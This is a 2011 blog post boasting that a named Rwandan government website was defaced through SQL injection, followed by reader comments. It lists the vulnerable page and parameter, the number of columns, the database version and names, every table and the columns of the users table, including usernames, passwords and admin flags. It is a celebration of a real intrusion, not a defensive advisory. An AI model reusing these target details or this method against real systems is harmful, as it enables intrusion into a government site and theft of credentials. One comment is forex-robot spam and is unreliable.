Friday, December 30, 2011

www.orinfor.gov.rw hacked by x________X

www.orinfor.gov.rw hacked by "x________X " he found it a sql injection vulnerability on orinfor website
DEFACE PAGE:
http://www.orinfor.gov.rw/x________X.html

Vulnerable URL:
Code:
http://www.orinfor.gov.rw/jobdetails.php?jid=3



Number of Columns:
Code:
5


Version:
Code:
5.0.51a-3ubuntu5.5


Databases:
Code:
information_schema,mysql,orinfordb


Tables from current DB:
Code:
orinfor_adverts,orinfor_audiofiles,orinfor_comments,orinfor_communityradios,orin​for_config,orinfor_downloads,orinfor_forex,orinfor_news,orinfor_newscategories,o​rinfor_othercontent,orinfor_pollanswers,orinfor_polls,orinfor_pollvotes,orinfor_​profiles,orinfor_radiomessages,orinfor_radiopresenters,orinfor_radioprogrammes,o​rinfor_regionalcenters,orinfor_search,orinfor_settings,orinfor_sitesections,orin​for_subscriptions,orinfor_tvprogrammes,orinfor_tvstaff,orinfor_userpermissions,o​rinfor_users,orinfor_vacancies,orinfor_videos,orinfor_volumes


Columns from 'orinfor_users':
Code:
Date of Announcement: userid,username,password,isadmin,fullname


4 comments:

  1. Hey man I would like to collaborate wit you!
    wat do u say about it?!

    ReplyDelete
  2. ark gukorana bituma mukora byinshi kandi bifite kime!!!!!!!!!!

    ReplyDelete
  3. GPS robot [10x increase of the deposit amount]

    I just got done with a webinar with Mark and his partner, Antony, two days ago and it was AWESOME.

    During the webinar MARK and ANTONY shared their stories to success and answered questions about their new release of the GPS Forex Robot that CAME OUT TODAY!

    ReplyDelete